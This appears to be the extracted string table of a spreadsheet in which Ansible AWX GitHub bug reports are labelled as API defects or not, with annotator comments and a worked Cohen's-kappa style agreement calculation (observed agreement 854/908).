TEXT [REQUIRED] Name of this credential type. awx credential_types create: argument --inputs: invalid int value: "\\{'fields': [\\{'id': 'password', 'label':'password', 'secret':true, 'type':'string'\\}]\\}" ``` But if you pass an integer (which makes no sense), you get error from API: ``` awx credential_types create --name foo_cred_type1 --kind cloud --inputs=42 {"inputs": ["int provided, expected dict"]} ``` ##### EXPECTED RESULTS &lt;!-- What did you expect to happen when running the steps above? --&gt; Either have reasonable way provide `inputs` to the new credential_type or do not allow creation from command line. This is something we need to consider what a reasonable UX would be for specifying the new credential type inputs.</t>
  </si>
  <si>
    <t>Observed agreement is the proportion of items where A1 and A2 agree:</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/4781</t>
  </si>
  <si>
    <t>workflow_job_template_nodes POST authentication issuees</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY When trying to POST to workflow_job_template_nodes using basic auth and/or token-auth AWX replies with 401 failure. `awx_web | 2019-09-19 08:40:32,754 WARNING awx.api.generics status 401 received by user AnonymousUser attempting to access /api/v2/workflow_job_template_nodes/ from XXX.XXX.XXX.XXX awx_web | 2019-09-19 08:40:32,780 WARNING django.request Bad Request: /api/v2/workflow_job_template_nodes/ awx_web | 2019-09-19 08:40:32,780 WARNING django.request Bad Request: /api/v2/workflow_job_template_nodes/ awx_web | [pid: 153|app: 0|req: 57/208] XXX.XXX.XXX.XXX () {38 vars in 568 bytes} [Thu Sep 19 08:40:32 2019] POST /api/v2/workflow_job_template_nodes/ =&gt; generated 140 bytes in 74 msecs (HTTP/1.1 400) 8 headers in 246 bytes (1 switches on core 0) awx_web | XXX.XXX.XXX.XXX - - [19/Sep/2019:08:40:32 +0000] "POST /api/v2/workflow_job_template_nodes/ HTTP/1.1" 400 140 "-" "curl/7.54.0" "-"` ##### ENVIRONMENT * AWX version: 7.0.0 * AWX install method: docker on linux * Ansible version: 2.6 * Operating System: CentOS * Web Browser: Curl 7.54 ##### STEPS TO REPRODUCE 0. nodes.json `{ { "type": "workflow_job_template_node", "workflow_job_template": { "id": 1238, "name": "DNS WF", "description": "" }, "unified_job_template": { "id": 820, "name": "template-name", "unified_job_type": "job" } "extra_data": {}, "inventory": null, "scm_branch": null, "job_type": null, "job_tags": "", "skip_tags": null, "limit": "", "diff_mode": null, "verbosity": null, "workflow_job_template": 1238, "unified_job_template": 820, "success_nodes": [], "failure_nodes": [], "always_nodes": [] } } ` 1. `curl -vvv -f -H 'Authorization: Token XXXX' -u username:password -H 'Content-Type: application/json' -XPOST http://awxhost/api/v2/workflow_job_template_nodes/ -d @nodes.json` ##### EXPECTED RESULTS Creation of nodes for related workflow ##### ACTUAL RESULTS Authorization failure. Client: ``` * The requested URL returned error: 400 Bad Request * stopped the pause stream! 100 706 0 0 100 706 0 7887 --:--:-- --:--:-- --:--:-- 7932 * Closing connection 0 curl: (22) The requested URL returned error: 400 Bad Request ``` Server: ``awx_web | 2019-09-19 08:40:32,754 WARNING awx.api.generics status 401 received by user AnonymousUser attempting to access /api/v2/workflow_job_template_nodes/ from XXX.XXX.XXX.XXX awx_web | 2019-09-19 08:40:32,780 WARNING django.request Bad Request: /api/v2/workflow_job_template_nodes/ awx_web | 2019-09-19 08:40:32,780 WARNING django.request Bad Request: /api/v2/workflow_job_template_nodes/ awx_web | [pid: 153|app: 0|req: 57/208] XXX.XXX.XXX.XXX () {38 vars in 568 bytes} [Thu Sep 19 08:40:32 2019] POST /api/v2/workflow_job_template_nodes/ =&gt; generated 140 bytes in 74 msecs (HTTP/1.1 400) 8 headers in 246 bytes (1 switches on core 0) awx_web | XXX.XXX.XXX.XXX - - [19/Sep/2019:08:40:32 +0000] "POST /api/v2/workflow_job_template_nodes/ HTTP/1.1" 400 140 "-" "curl/7.54.0" "-"`` ##### ADDITIONAL INFORMATION</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/4907</t>
  </si>
  <si>
    <t>inventory updates + project updates deployed to container groups don't report execution node</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY &lt;!-- Briefly describe the problem. --&gt; This is a known issue of https://github.com/ansible/awx/pull/4189 that will be resolved in follow up PR. Inventory updates need to run on a Tower node, and this does happen even when "deployed" to a Container Group. The problem is, there is no way to figure out from API what tower node it was deployed to. This is connected to the fact that there is no designated "controller node" for the Container Groups, solving that may help this. Regardless, currently if an inventory update is "deployed" to a container group it will show the container group on the inventory update, but no execution node or controller node, so it is unclear where the update actually ran. ##### STEPS TO REPRODUCE &lt;!-- Please describe exactly how to reproduce the problem. --&gt; 1) create a working Container Group 2) Create an organization 3) Assign Container Group to organization as only instance group 4) create inventory with inventory source OR create project 5) launch inventory update or project update ##### EXPECTED RESULTS &lt;!-- What did you expect to happen when running the steps above? --&gt; One of the Tower nodes is shown as execution node ##### ACTUAL RESULTS &lt;!-- What actually happened? --&gt; No execution node, only container group shown</t>
  </si>
  <si>
    <t xml:space="preserve">api response is incorrect, it expected to have more data  </t>
  </si>
  <si>
    <t>ok</t>
  </si>
  <si>
    <t>Po=607+247908=854908≈0.940Po = \frac{607 + 247}{908} = \frac{854}{908} \approx 0.940Po=908607+247​=908854​≈0.940</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/4910</t>
  </si>
  <si>
    <t>jobs still dispatched to container group even if ResourceQuota will cause them to be rejected + fail immediately</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY &lt;!-- Briefly describe the problem. --&gt; This is a known issue of #4189 that will be resolved in follow up PR. _IF the user sets up the namespace that they use for the Container Group with a ResourceQuota_... @one-t has confirmed that when a Container Group has exceeded capacity (e.g. has met its ResourceQuota) , jobs will still be sent to it because of lack of capacity calculation for ContainerGroups. The jobs then immediately fail becaues of a `403` response from kubernetes API instead of expected behavior of waiting to dispatch job until an instance group has capacity to run it. This means in a Tower environment that is saturated with jobs such that all other resources available to a new job are out of capacity, the Container Group will still appear to have capacity even if it itself has also exceeded resource limits. This will cause the job and any future jobs dispatched to the CG to immediately fail until resources are freed up. ##### STEPS TO REPRODUCE &lt;!-- Please describe exactly how to reproduce the problem. --&gt; Create a ResourceQuota in the namespace you use to set up a ContainerGroup Associate the ContainerGroup with a JT Launch more jobs that your ResourceQuota will allow ##### EXPECTED RESULTS &lt;!-- What did you expect to happen when running the steps above? --&gt; Later jobs will go into pending until resources are available ##### ACTUAL RESULTS &lt;!-- What actually happened? --&gt; Later jobs fail immediately with `403` from kubernetes API ##### ADDITIONAL INFORMATION &lt;!-- Include any links to sosreport, database dumps, screenshots or other information. --&gt; @one-t can provide more details about how to configure your namespace ResourceQuota</t>
  </si>
  <si>
    <t>Step 2: Calculate expected agreement (Pe)</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/4943</t>
  </si>
  <si>
    <t>System Auditor is unable to view Container Groups</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY System Auditor is unable to view Container Groups ##### ENVIRONMENT * AWX version: 7.0.0 ##### STEPS TO REPRODUCE 1. Create Container Group 2. Log in as System Auditor 3. Attempt to view a container group ##### EXPECTED RESULTS Able to view container group like an instance group ##### ACTUAL RESULTS Unable to view container group ##### ADDITIONAL INFORMATION ![Screen Shot 2019-10-08 at 5 32 17 PM](https://user-images.githubusercontent.com/12446869/66435218-5c375b80-e9f2-11e9-8abb-0be7ba30ad30.png)</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/5028</t>
  </si>
  <si>
    <t>500 Error when creating notification templates with bad message format</t>
  </si>
  <si>
    <t>```shell $ awx notification_templates create --name "Testing 123" --organization Default --notification_type webhook --messages '{"success": "500 error"}' --notification_configuration '{"url": "http://example.org", "headers": {}}' ``` &lt;img width="932" alt="image" src="https://user-images.githubusercontent.com/214912/67009102-e2ba0000-f0b8-11e9-9346-816dea7ffa02.png"&gt;</t>
  </si>
  <si>
    <t>Expected agreement is the sum over categories of the product of the raters' marginal probabilities:</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/5046</t>
  </si>
  <si>
    <t>Child WorkflowJob not started when Inventory on WorkflowJobTemplateNode</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY I have nested workflow templates, when I set Prompt on launch on child workflow template and set Inventory through "Prompt" in Workflow visualizer, then Launch is in Running state forever and Workflow job for child Workflow template doesn't exist (is probably deleted, because there is missing ID in list of Jobs) ##### ENVIRONMENT * AWX version: Tower 3.5.0 * AWX install method: AMI - https://www.ansible.com/products/tower/trial - Tower in Amazon EC2 * Ansible version: 2.8.0 * Operating System: * Web Browser: Google Chrome 77.0.3865.120 ##### STEPS TO REPRODUCE Child Workflow template contains: - No inventory, Prompt on launch - Job Template with https://github.com/mkanoor/playbook/blob/master/hello_world.yml - No inventory, Prompt on launch - Workflow Job Template Node with Inventory1 (added through "Prompt" button in Workflow visualizer) Parent Workflow template contains: - No inventory - Child workflow - (No inventory, Prompt on Launch) - Workflow Job Template Node with Inventory2 (added through "Prompt" button in Workflow visualizer) ``` Parent Workflow (without Inventory) (Start) ==&gt; (Inventory2 on Workflow Node) ==&gt; [ Child Workflow (without Inventory, Prompt on Launch) =&gt; (Start) ==&gt; (Inventory1 on Workflow Node) ==&gt; Job Template with Prompt on Launch ] ``` ##### EXPECTED RESULTS Job Template should be successfully finished (I suppose with Inventory2?) ##### ACTUAL RESULTS Parent workflow job Status = Running forever Child workflow job doesn't exist (probably deleted, one ID in Jobs is missing) API: (the only node) in `api/workflow_jobs/&lt;parent_workflow_id&gt;/workflow_nodes` doesn't have `/summary_fields/job`, also `/related/job` doesn't exist. But there are `/summary_fields/inventory` and `/related/inventory`. Parent workflow doesn't have inventory In another case that Parent workflow has inventory and workflow node doesn't have, then `/summary_fields/job` and `/related/job` links exist and point to child workflow. ##### ADDITIONAL INFORMATION &lt;!-- Include any links to sosreport, database dumps, screenshots or other information. --&gt;</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/5081</t>
  </si>
  <si>
    <t>Setting base url fail with error 400</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY Whe have an internal dns with a domain like "org.les800" when i'm trying to set the base url of the tower host with something like "tower.org.les800", it fail with an error 400 and url not valid ##### ENVIRONMENT * AWX version: 8.0.0 * AWX install method: MrMee rpm * Ansible version: 2.8.6 * Operating System: CentOS 7.7 * Web Browser: Chrome latest ##### STEPS TO REPRODUCE try an url like http://tower.org.les800 in settings/system ##### EXPECTED RESULTS url for the base host set ##### ACTUAL RESULTS got url with the name of the server instead ##### ADDITIONAL INFORMATION &lt;!-- Include any links to sosreport, database dumps, screenshots or other information. --&gt;</t>
  </si>
  <si>
    <t>Probability A1 says defect: PA1,defect=612908≈0.674P_{A1,defect} = \frac{612}{908} \approx 0.674PA1,defect​=908612​≈0.674</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/5093</t>
  </si>
  <si>
    <t>[AWXKIT] Unable to provide extra_vars when launching workflow_job_template</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY Using the AWXKIT CLI tool `awx` it is not possible to provide extra parameters like `scm_branch` or `extra_vars` when launching a workflow_job_template. ##### ENVIRONMENT * AWX version: 8.0.0 * AWX install method: docker on linux * Ansible version: 2.7.10 (Client) * Operating system: macOS Mojave ##### STEPS TO REPRODUCE Installed AWX 8.0.0 and created a workflow `sample_workflow`, which * has survey enabled: "Ask for `foobar`" * prompt for SCM branch when launching workflow Installed AWXKIT: ```pip install "https://github.com/ansible/awx/archive/8.0.0.tar.gz#egg=awxkit&amp;subdirectory=awxkit"``` Tried to launch workflow: ```awx workflow_job_templates launch sample_workflow``` Result: ```{"variables_needed_to_start": ["'foobar' value missing"]}``` Tried to extend request by using same parameter as for `tower-cli`: ```awx workflow_job_templates launch sample_workflow -e '{"foobar": 12345}'``` After enabling debug output `awx` threw a warning, that `-e` is an `unrecognized argument`. Tried various arguments like * `--extra_vars` * `--extra-vars` * `-extra_vars` * ... Same result. ##### EXPECTED RESULTS CLI tool should ask for missing configuration items like `extra_vars`, `scm_branch`, or at least provide documentation on how to launch this special kind of workflow_job_templates. ##### ACTUAL RESULTS See "Steps to reproduce"</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/5099</t>
  </si>
  <si>
    <t>Default for webhook_service is not in field choices and not accepted</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY The OPTIONS for job_templates is not self-consistent for the field `webhook_service`. This breaks the `tower-cli send` command, assuming the data comes from the receive command. A hack is in progress for this, but it would be better to change behavior from API moving forward. ##### ENVIRONMENT * AWX version: 8.0.0 * AWX install method: N/A * Ansible version: N/A * Operating System: * Web Browser: ##### STEPS TO REPRODUCE Of particular interest here is the sequence of `tower-cli receive`, saving that to a file, and using it in `tower-cli send`. ##### EXPECTED RESULTS Data given from the API is consistent with OPTIONS ##### ACTUAL RESULTS OPTIONS for job_templates gives ```json "webhook_service": { "type": "choice", "label": "Webhook service", "help_text": "Service that webhook requests will be accepted from", "filterable": true, "choices": [ [ "github", "GitHub" ], [ "gitlab", "GitLab" ] ] ``` The receive command always gives `webhook_credential` in the asset data because it has no default. Without a default, it cannot be determined if the field has been set. The send command gives ``` JOB TEMPLATE [SRtest] *************************************************************************************************************************************************************** Value is not a valid choice for option webhook_service for job_template SRtest. Options: ['github', 'GitHub', 'gitlab', 'GitLab'] ``` ##### ADDITIONAL INFORMATION https://github.com/ansible/tower-cli/pull/741 Ping @jbradberry, @john-westcott-iv In terms of CLI design in general, @ryanpetrello I find the ability to determine if a field has a non-default value is a powerful tool. This is one of the things I most like about the send/receive commands. I would even prefer that for compact representations of resources for human consumption.</t>
  </si>
  <si>
    <t>Probability A1 says non-defect: PA1,non=296908≈0.326P_{A1,non} = \frac{296}{908} \approx 0.326PA1,non​=908296​≈0.326</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/5110</t>
  </si>
  <si>
    <t>JOB TAGS and SKIP TAGS not being honored via "prompt on launch"</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY User entered values for SKIP TAGS and JOB TAGS are not honored. ##### ENVIRONMENT * AWX version: 8.0.0 * AWX install method: docker on linux * Ansible version: 2.8.5 * Operating System: RHEL 7.6 * Web Browser: Chrome Version 78.0.3904.70 (Official Build) (64-bit) ##### STEPS TO REPRODUCE Configure a template to have null or populated values in JOB TAGS and SKIP TAGS and activate "prompt on launch" for those 2 fields. ![tags_null](https://user-images.githubusercontent.com/56000662/67570164-bb89b100-f6fe-11e9-8cd9-bc0b31d44edf.png) On launch, enter the tags one might want to run/skip ![tags_tagged](https://user-images.githubusercontent.com/56000662/67570267-eecc4000-f6fe-11e9-9671-c37445f0c425.png) Click next to get to the job preview. The preview shows no tags have been assigned to the job though they were in fact entered. On launch of the job, the requested tags will not be honored. ![tags_nothonored](https://user-images.githubusercontent.com/56000662/67570508-934e8200-f6ff-11e9-9d57-3af0801cd660.png) NOTE: If the template is saved WITH values, and prompt on launch is selected. You may REMOVE those predefined values with no issue. Any new values entered during "prompt to launch" will still go unrecognized. ##### EXPECTED RESULTS JOB TAGS and SKIP TAGS values are assigned via "prompt on launch" and honored in job execution ![tags_honored](https://user-images.githubusercontent.com/56000662/67570589-cbee5b80-f6ff-11e9-9eb9-d8f34d52e7df.png) ##### ACTUAL RESULTS Jobs run without honoring the tags entered by the user. ##### ADDITIONAL INFORMATION &lt;!-- Include any links to sosreport, database dumps, screenshots or other information. --&gt;</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/5478</t>
  </si>
  <si>
    <t>Deleting Oauth token with itself throws 500 error</t>
  </si>
  <si>
    <t>1. create an Oauth token for a user 2. delete the Oauth token using itself as the Bearer `curl -k -H 'Authorization: Bearer r8jwGD25D9rIDQ6F1lqcRwrejR9gR7' -X DELETE https://localhost/api/v2/tokens/21/` 3. Observe HTTP 500</t>
  </si>
  <si>
    <t>Probability A2 says defect: PA2,defect=656908≈0.722P_{A2,defect} = \frac{656}{908} \approx 0.722PA2,defect​=908656​≈0.722</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/5528</t>
  </si>
  <si>
    <t>New AWX CLI returns type error when modifying list or dict settings</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY When trying to modify a list or dictionary valued setting from the **awx** command line tool, the API return a type error. ##### ENVIRONMENT * AWX version: 9.0.1 * AWX install method: Kubernetes * Ansible version: 2.7.11 * Operating System: Ubuntu 18.04 * Web Browser: Firefox 71 ##### STEPS TO REPRODUCE 1. Install the AWX CLI tool: ``` pip install "https://github.com/ansible/awx/archive/9.0.1.tar.gz#egg=awxkit&amp;subdirectory=awxkit" ``` 2. Try to modify the AUTH_LDAP_GROUP_SEARCH (type list) setting ``` awx settings modify AUTH_LDAP_USER_SEARCH '["DC=example,DC=com","SCOPE_SUBTREE","(uid=%(user)s)"]' ``` 3. Receive the following error ``` {"AUTH_LDAP_USER_SEARCH": ["Expected a list of items but got type \"str\"."]} ``` ##### EXPECTED RESULTS Expected to modify the setting like the old tower-cli or awx-cli tools were able to. ##### ACTUAL RESULTS Received a type error ``` {"AUTH_LDAP_USER_SEARCH": ["Expected a list of items but got type \"str\"."]} ``` ##### ADDITIONAL INFORMATION You can achieve the same modification with the awx-cli: ``` awx-cli setting modify AUTH_LDAP_USER_SEARCH '["DC=example,DC=com","SCOPE_SUBTREE","(uid=%(user)s)"]' Resource changed. ===================== =========================================================== id value ===================== =========================================================== AUTH_LDAP_USER_SEARCH [u'DC=example,DC=com', u'SCOPE_SUBTREE', u'(uid=%(user)s)'] ===================== =========================================================== ```</t>
  </si>
  <si>
    <t>Api return type error , so this were api request error</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/5717</t>
  </si>
  <si>
    <t>awx cli schedules create cannot create schedule if the user is of type Normal User with required permissions.</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY awx cli schedules create cannot create schedule if the user is of type Normal User with required permissions on the object or even with Organization admin role. Currently the user needs to be a System Administrator type to create the schedule. From the UI the Normal User with permission can create the schedule. POST at the /api/v2/schedules/ endpoint is only available for the user with System Administrator type which is the endpoint used by awx schedules create command. ##### ENVIRONMENT * AWX version: Tower 3.6.2 * AWX install method: Tower 3.6.2 cluster installed with online installer * Ansible version: 2.9.1 * Operating System: RHEL 8 * Web Browser: Chrome 79 ##### STEPS TO REPRODUCE * Create a normal user: * Assign permission to a job template or set the user role as Organization admin. * Try to create the schedule for the job template using awx cli. ``` awx --conf.host https://tower.ishwar.io --conf.username test --conf.password 'PASSWORD' schedules create --name=test --unified_job_template=111 --rrule="DTSTART;TZID=America/New_York:20180208T221500 RRULE:FREQ=MONTHLY;INTERVAL=1;BYDAY=TH;BYSETPOS=3" -vvv ``` * Change the user type to system administrator and rerun the command. ##### EXPECTED RESULTS ``` DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): tower.ishwar.io:443 DEBUG:urllib3.connectionpool:https://tower.ishwar.io:443 "GET /api/ HTTP/1.1" 200 188 DEBUG:awxkit.api.client:"GET https://tower.ishwar.io/api/" elapsed: 0:00:00.208793 DEBUG:awxkit.api.registry:Retrieved &lt;class 'awxkit.api.pages.api.ApiV2'&gt; by url: /api/v2/ DEBUG:urllib3.connectionpool:https://tower.ishwar.io:443 "GET /api/v2/ HTTP/1.1" 200 1688 DEBUG:awxkit.api.client:"GET https://tower.ishwar.io/api/v2/" elapsed: 0:00:00.047443 DEBUG:urllib3.connectionpool:https://tower.ishwar.io:443 "GET /api/ HTTP/1.1" 200 188 DEBUG:awxkit.api.client:"GET https://tower.ishwar.io/api/" elapsed: 0:00:00.052170 DEBUG:urllib3.connectionpool:https://tower.ishwar.io:443 "POST /api/login/ HTTP/1.1" 302 0 DEBUG:awxkit.api.client:"POST https://tower.ishwar.io/api/login/" elapsed: 0:00:00.247407 DEBUG:urllib3.connectionpool:https://tower.ishwar.io:443 "GET /api/ HTTP/1.1" 200 188 DEBUG:awxkit.api.client:"GET https://tower.ishwar.io/api/" elapsed: 0:00:00.080558 DEBUG:urllib3.connectionpool:https://tower.ishwar.io:443 "GET /api/ HTTP/1.1" 200 188 DEBUG:awxkit.api.client:"GET https://tower.ishwar.io/api/" elapsed: 0:00:00.084587 DEBUG:awxkit.api.registry:Retrieved &lt;class 'awxkit.api.pages.schedules.Schedules'&gt; by url: /api/v2/schedules/ DEBUG:urllib3.connectionpool:https://tower.ishwar.io:443 "OPTIONS /api/v2/schedules/ HTTP/1.1" 200 13449 DEBUG:awxkit.api.client:"OPTIONS https://tower.ishwar.io/api/v2/schedules/" elapsed: 0:00:00.101736 DEBUG:awxkit.api.registry:Retrieved &lt;class 'awxkit.api.pages.schedules.Schedules'&gt; by url: /api/v2/schedules/ DEBUG:urllib3.connectionpool:https://tower.ishwar.io:443 "OPTIONS /api/v2/schedules/1/ HTTP/1.1" 200 7915 DEBUG:awxkit.api.client:"OPTIONS https://tower.ishwar.io/api/v2/schedules/1/" elapsed: 0:00:00.120726 awx: unrecognized arguments: -vvv DEBUG:awxkit.api.registry:Retrieved &lt;class 'awxkit.api.pages.schedules.Schedules'&gt; by url: /api/v2/schedules/ DEBUG:urllib3.connectionpool:https://tower.ishwar.io:443 "POST /api/v2/schedules/ HTTP/1.1" 201 1552 DEBUG:awxkit.api.client:"POST https://tower.ishwar.io/api/v2/schedules/" elapsed: 0:00:00.156802 DEBUG:awxkit.api.registry:Retrieved &lt;class 'awxkit.api.pages.schedules.Schedules'&gt; by url: /api/v2/schedules/ { "rrule": "DTSTART;TZID=America/New_York:20180208T221500 RRULE:FREQ=MONTHLY;INTERVAL=1;BYDAY=TH;BYSETPOS=3", "id": 14, "type": "schedule", "url": "/api/v2/schedules/14/", "summary_fields": { "unified_job_template": { "id": 111, "name": "test-schedule", "description": "", "unified_job_type": "job" }, "created_by": { "id": 121, "username": "test", "first_name": "test", "last_name": "test" }, "modified_by": { "id": 121, "username": "test", "first_name": "test", "last_name": "test" }, "user_capabilities": { "edit": true, "delete": true }, "inventory": { "id": 29, "name": "Demo Inventory", "description": "", "has_active_failures": false, "total_hosts": 1, "hosts_with_active_failures": 0, "total_groups": 0, "groups_with_active_failures": 0, "has_inventory_sources": false, "total_inventory_sources": 0, "inventory_sources_with_failures": 0, "organization_id": 1, "kind": "", "insights_credential_id": null } }, "created": "2020-01-21T07:31:19.312383Z", "modified": "2020-01-21T07:31:19.312398Z", "name": "test", "description": "", "extra_data": {}, "inventory": null, "scm_branch": null, "job_type": null, "job_tags": null, "skip_tags": null, "limit": null, "diff_mode": null, "verbosity": null, "unified_job_template": 111, "enabled": true, "dtstart": "2018-02-16T03:15:00Z", "dtend": null, "next_run": "2020-02-21T03:15:00Z", "timezone": "America/New_York", "until": "" } ``` ##### ACTUAL RESULTS ``` DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): tower.ishwar.io:443 DEBUG:urllib3.connectionpool:https://tower.ishwar.io:443 "GET /api/ HTTP/1.1" 200 188 DEBUG:awxkit.api.client:"GET https://tower.ishwar.io/api/" elapsed: 0:00:00.173558 DEBUG:awxkit.api.registry:Retrieved &lt;class 'awxkit.api.pages.api.ApiV2'&gt; by url: /api/v2/ DEBUG:urllib3.connectionpool:https://tower.ishwar.io:443 "GET /api/v2/ HTTP/1.1" 200 1688 DEBUG:awxkit.api.client:"GET https://tower.ishwar.io/api/v2/" elapsed: 0:00:00.046141 DEBUG:urllib3.connectionpool:https://tower.ishwar.io:443 "GET /api/ HTTP/1.1" 200 188 DEBUG:awxkit.api.client:"GET https://tower.ishwar.io/api/" elapsed: 0:00:00.050566 DEBUG:urllib3.connectionpool:https://tower.ishwar.io:443 "POST /api/login/ HTTP/1.1" 302 0 DEBUG:awxkit.api.client:"POST https://tower.ishwar.io/api/login/" elapsed: 0:00:00.247518 DEBUG:urllib3.connectionpool:https://tower.ishwar.io:443 "GET /api/ HTTP/1.1" 200 188 DEBUG:awxkit.api.client:"GET https://tower.ishwar.io/api/" elapsed: 0:00:00.088723 DEBUG:urllib3.connectionpool:https://tower.ishwar.io:443 "GET /api/ HTTP/1.1" 200 188 DEBUG:awxkit.api.client:"GET https://tower.ishwar.io/api/" elapsed: 0:00:00.081436 DEBUG:awxkit.api.registry:Retrieved &lt;class 'awxkit.api.pages.schedules.Schedules'&gt; by url: /api/v2/schedules/ DEBUG:urllib3.connectionpool:https://tower.ishwar.io:443 "OPTIONS /api/v2/schedules/ HTTP/1.1" 200 11598 DEBUG:awxkit.api.client:"OPTIONS https://tower.ishwar.io/api/v2/schedules/" elapsed: 0:00:00.088985 DEBUG:awxkit.api.registry:Retrieved &lt;class 'awxkit.api.pages.schedules.Schedules'&gt; by url: /api/v2/schedules/ DEBUG:urllib3.connectionpool:https://tower.ishwar.io:443 "OPTIONS /api/v2/schedules/1/ HTTP/1.1" 200 6065 DEBUG:awxkit.api.client:"OPTIONS https://tower.ishwar.io/api/v2/schedules/1/" elapsed: 0:00:00.112443 usage: awx schedules [-h] action ... positional arguments: action list get modify delete optional arguments: -h, --help show this help message and exit awx schedules: argument action: invalid choice: 'create' (choose from 'list', 'get', 'modify', 'delete') ```</t>
  </si>
  <si>
    <t>"Confirmed, this is an API permissions bug that prevents normal users from ever doing a POST /api/v2/schedules/, not a bug in the CLI. The issue looks like:
OPTIONS /api/v2/schedules/ doesn't show POST if you have execute role on at least one UJT." comment on the isuue</t>
  </si>
  <si>
    <t>Probability A2 says non-defect: PA2,non=252908≈0.278P_{A2,non} = \frac{252}{908} \approx 0.278PA2,non​=908252​≈0.278</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/5744</t>
  </si>
  <si>
    <t>More Helpful Error Message on api/v2/inventories Endpoint</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY When trying to change a regular inventory into a "smart" inventory, the `PUT` and `PATCH` both error out (as they should), but the error message is not very informative. Please see screenshots below for both PUT and PATCH errors: &lt;img width="1048" alt="PUTNotAllowed" src="https://user-images.githubusercontent.com/28930622/72933561-f3b98380-3d2f-11ea-9269-7320367cabb3.png"&gt; &lt;img width="1033" alt="PATCHNotAllowed" src="https://user-images.githubusercontent.com/28930622/72933566-f6b47400-3d2f-11ea-8540-147b2da53dc8.png"&gt; It would be nice if the error was something more along the lines of `'You cannot turn a regular inventory into a "smart" inventory.'` ##### ENVIRONMENT * AWX version: 9.1.1 * AWX install method: docker for mac * Web Browser: Chrome ##### STEPS TO REPRODUCE Navigate to a pre-existing _regular_ inventory endpoint via `api/v2/inventories/[id]`, then try to `PUT` or `PATCH` to try to make it into a "smart" inventory: ``` { "name": "[inventory_name]", "description": "", "organization": [inventory_id], "kind": "smart", "host_filter": null, "variables": "", "insights_credential": null } ``` ##### EXPECTED RESULTS An error message that tells the user that a regular inventory can't be turned into a smart inventory. ##### ACTUAL RESULTS ``` { "detail": "Method \"PATCH\" not allowed." } ```</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/5882</t>
  </si>
  <si>
    <t>API Provides credential_type for WFJTs</t>
  </si>
  <si>
    <t>##### ISSUE TYPE Bug maybe? ##### SUMMARY Missing information in the WFJT end point re: webhook credentials. JobTemplates end point provides credential type and kind information, but WFJT end point does not provide that info for webhook credentials. It would be nice to have. ##### ENVIRONMENT * AWX version: 9.1.1 * AWX install method: docker for mac * Ansible version: 2.10 * Operating System: Mojave * Web Browser: Chrome ##### STEPS TO REPRODUCE Generate a workflow JT with a webhook credential. Go to api gui for that WFJT ##### EXPECTED RESULTS Credential type and credential kind info would be provided. ##### ACTUAL RESULTS Credential type and credential kind are not provided at that end point when all the other info for the template is provided.</t>
  </si>
  <si>
    <t>Now compute expected agreement:</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/5964</t>
  </si>
  <si>
    <t>awx kit provides a bad error message</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY When authentication fails awx kit gives a cryptic error message ##### ENVIRONMENT * AWX version: devel * AWX install method: mac * Ansible version: 2.8.2 * Operating System: mac * Web Browser: N/A ##### STEPS TO REPRODUCE Attempt to login to awx with bad credentials. ##### EXPECTED RESULTS &gt; Unauthorized: Unauthorized (401) received - {'detail': 'Authentication credentials were not provided. To establish a login session, visit /api/login/.'} ##### ACTUAL RESULTS &gt; TypeError: '&gt;=' not supported between instances of 'Unauthorized' and 'int' ##### ADDITIONAL INFORMATION &gt; akit --base-url httsp://some-awx -c ~/creds/credentials.vault -f load_resources.py -x</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/5983</t>
  </si>
  <si>
    <t>List Navigation 404</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY List navigation error. ##### ENVIRONMENT * AWX version: 2.10 * AWX install method: docker for mac * Ansible version: 9.2.1 * Operating System: Mojave * Web Browser: Chrome ##### STEPS TO REPRODUCE Go to a list and select either 5 or 10 items per page. Navigate to the last page. Then select a number of items per page higher that what you selected originally. If you selected 5 items per page originally then select 10 items per page. ##### EXPECTED RESULTS Page should reset to the first page and no 404 error ##### ACTUAL RESULTS 404 error ##### ADDITIONAL INFORMATION ![navigation bug](https://user-images.githubusercontent.com/39280967/74779455-84ba4680-526b-11ea-9fad-8fb59a1bd556.gif)</t>
  </si>
  <si>
